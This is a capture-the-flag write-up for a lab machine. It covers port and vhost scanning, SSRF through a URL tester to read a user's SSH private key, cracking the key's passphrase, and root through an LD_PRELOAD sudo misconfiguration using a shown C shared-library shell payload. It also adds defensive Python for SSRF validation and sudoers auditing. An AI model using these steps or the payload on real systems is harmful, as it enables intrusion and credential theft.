Target IP: 10.10.164.67
Challenge Description: Exploit a vulnerable web application and some misconfigurations to gain root privileges.
Performing a port scan using the command sudo nmap -sS 10.10.164.67 -p- shows there are two TCP ports open on the target machine: SSH and HTTP on their standard ports, as shown above.
I performed an aggressive port scan using the command sudo nmap -sV -A 10.10.164.67 -p 22,80 and obtained the result shown above. The HTTP application on port 80 seems the most interesting to me. The HTTP request also gets redirected to http://creative.thm according to the scan above. I will need to insert the hostname creative.thm inside my /etc/hosts file.
I inserted the hostname creative.thm inside my /etc/hosts file, as shown above.
I performed a VHOST enumeration using ffuf out of curiosity. The command I used is ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.creative.thm" -u http://creative.thm -fs 178 and got a hit on the entry beta, as shown above. Now I can insert this into my /etc/hosts too. I used -fs 178 to filter out the responses of size 178 bytes, which were the false positives returned for every non-existent vhost.
Now my /etc/hosts file contains the two entries, as shown above. Now I can begin with the enumeration.
Port 80: HTTP (creative.thm)
The webpage above is displayed for this web application.
I notice the web application is running jQuery 3.4.1. From the past, I know this is vulnerable to XSS attack. I also identified the Contact Us page on the web application. Maybe XSS is an attack vector I can use?
Since the web application is using jQuery 3.4.1 and this is lower than 3.5.0, it is potentially vulnerable to XSS, as shown above. However, when I tried to leverage XSS payloads -- I had no luck. Time to enumerate harder.
I performed a directory search using the command gobuster dir -u http://creative.thm/ -w /usr/share/wordlists/dirb/big.txt -x html,php,txt and got a few hits, as shown above. I find the /assets entry interesting. I browsed to http://creative.thm/assets/ and got a 403 Forbidden page. The only remaining lead is the beta.creative.thm vhost.
Port 80: HTTP (beta.creative.thm)
The webpage above is displayed for this web application. It seems to be a URL tester. I scanned the source code of the webpage and did not find anything useful. Time to put the web application to the test.
I fired up Burp Suite and intercepted a request to the web application. I made a request to http://creative.thm, as shown above. I tried command injection but I had no luck, as I obtained the result Dead. Maybe SSRF is an attack vector I can use?
On my machine, I created a text file that contains the numbers from 1 to 65535. Then using ffuf, I checked which ports are open by using the command ffuf -u http://beta.creative.thm/ -w ports_check.txt -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "url=http://127.0.0.1:FUZZ" -fw 3. And I got a hit. There are two TCP ports open: 80 and 1337. The second port seems interesting to me. Maybe I can use the web application to access this port? I browsed to http://127.0.0.1:1337 by using the http://beta.creative.thm web application.
And bingo! Now I can access the directory listing shown above. The entry /home could possibly contain the users of the machine?
I browsed to http://127.0.0.1:1337/home/ using the web application again and got a hit! There is a user called saad, as shown above. One possible attack vector is to obtain the SSH key of this user. Time to test it. I browsed to http://127.0.0.1:1337/home/saad/.ssh/id_rsa using the web application again.
And bingo! Now I have the SSH key of the user saad. I viewed the raw content of the page using the browser's view-source: prefix, then copied the SSH key to my machine.
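The URL tester on beta.creative.thm fetched whatever url= value it was given, which is what let it reach 127.0.0.1:1337 and serve the key back. As an added example that is not part of the original writeup, this Python check is the destination validation such a tester should run before fetching; the resolver injection and the hostnames used in the test are assumptions, not anything from the target.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Only plain web schemes are acceptable for a URL tester; file://, gopher://
# and friends have no business here.
ALLOWED_SCHEMES = {"http", "https"}


def resolve_host(host, resolver=socket.gethostbyname):
    """Return the IP the tester would actually connect to.

    Literal IPs (IPv4 or IPv6) are used as-is; hostnames go through the
    resolver (the system resolver by default), so a DNS name that points at
    127.0.0.1 or 10.x.x.x is caught exactly like the literal address.
    """
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        return resolver(host)


def validate_target(url, resolver=socket.gethostbyname):
    """Return (allowed, reason) for a user-supplied URL.

    Rejects non-HTTP schemes and any destination that resolves to a
    loopback, private, link-local, multicast or otherwise non-public
    address, which blocks the 127.0.0.1:1337 style of request.
    """
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parsed.scheme
    if not parsed.hostname:
        return False, "missing host"
    try:
        ip_str = resolve_host(parsed.hostname, resolver)
    except OSError:  # socket.gaierror is a subclass of OSError
        return False, "host does not resolve"
    ip = ipaddress.ip_address(ip_str)
    if not ip.is_global or ip.is_multicast:
        return False, "address %s is not public" % ip
    # Hand the resolved IP back so the caller connects to it directly.
    return True, ip_str
```

The fetch must then connect to the returned IP rather than resolving the name a second time, otherwise a DNS answer that changes between check and fetch (rebinding) bypasses the check; every redirect hop needs the same validation.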
Since the SSH key is protected by a passphrase, I will need to obtain it. To achieve this, I used the command ssh2john id_rsa > hash to obtain the password hash of this SSH key. Then using the command john hash --wordlist=/usr/share/wordlists/rockyou.txt I managed to obtain the passphrase sweetness of the SSH key, as shown above. Now I can log in as the user saad :)
Voila! Now I have access to the SSH application as the user saad, as shown above. I connected to the target machine using the command ssh saad@beta.creative.thm -i id_rsa and the passphrase sweetness.
I transferred LinPEAS to the target machine and executed it, and obtained the crucial information shown above: the user saad is using the password MyStrongestPasswordYet$4291.
Running sudo -l with the new password returns the result shown above. Although the binary /usr/bin/ping can be executed as root, I am more interested in the env_keep+=LD_PRELOAD entry. Because sudo preserves the caller's LD_PRELOAD environment variable instead of resetting it, any permitted command will load a shared library of my choosing as root. This shared library misconfiguration can be used for local privilege escalation.
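The env_keep+=LD_PRELOAD entry that sudo -l revealed is the whole problem: sudo's default env_reset already drops the LD_* variables, so the entry has to be added deliberately. As an added example, not part of the original writeup, this Python audit flags dynamic-loader variables preserved by either a sudoers file or the "Matching Defaults" block of sudo -l output; the sample configuration below is constructed, not the target's real one.

```python
import re

# Dynamic-loader variables: if sudo preserves any of these, the calling user
# can make every permitted command load attacker-controlled code as root.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

# Matches env_keep = X, env_keep += X and quoted lists ("A B C"); works on
# raw sudoers lines and on the comma-separated block that `sudo -l` prints.
ENV_KEEP_RE = re.compile(r'\benv_keep\s*\+?=\s*(?:"([^"]*)"|([^\s,#]+))', re.I)


def audit_env_keep(text):
    """Return [(line_no, VAR), ...] for each loader variable kept by sudo."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        line = line.split("#", 1)[0]          # ignore commented-out entries
        for m in ENV_KEEP_RE.finditer(line):
            kept = (m.group(1) or m.group(2)).split()
            for var in kept:
                if var.upper() in LOADER_VARS:
                    findings.append((no, var.upper()))
    return findings


# Constructed sample: a sudoers fragment followed by the equivalent
# `sudo -l` output. Line 4 and line 8 should be flagged, line 5 should not.
SAMPLE = """\
Defaults        env_reset
Defaults        mail_badpass
Defaults        env_keep += "LANG LC_ALL"
Defaults        env_keep += "LD_PRELOAD"
# Defaults      env_keep += "LD_LIBRARY_PATH"
saad ALL=(root) /usr/bin/ping
Matching Defaults entries for saad on host:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD, secure_path=/usr/bin
"""

if __name__ == "__main__":
    for no, var in audit_env_keep(SAMPLE):
        print("line %d: sudo preserves %s; remove it from env_keep" % (no, var))
```

The fix is simply to delete the entry (or the variable from the quoted list) and rely on env_reset; nothing legitimate needs LD_PRELOAD to survive sudo.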
First, I changed to the /tmp directory and created a file called shell.c, as shown above. This file contains the code shown below.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid() and setuid() are declared here */

/* Runs when the library is loaded; with -nostartfiles this replaces the
   default initialiser, so it executes before ping's own main(). */
void _init() {
    unsetenv("LD_PRELOAD");   /* do not preload ourselves into the shell too */
    setgid(0);
    setuid(0);
    system("/bin/sh");
}
Then I compiled the C file into a shared library, checked the result, and ran ping through sudo with the library preloaded:
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so
sudo LD_PRELOAD=/tmp/shell.so ping
And after compiling the shared library and running ping under sudo with it preloaded, I now have root access on the target machine, as shown above. GG. Now I have full access to the target machine :)
The two flags are shown above.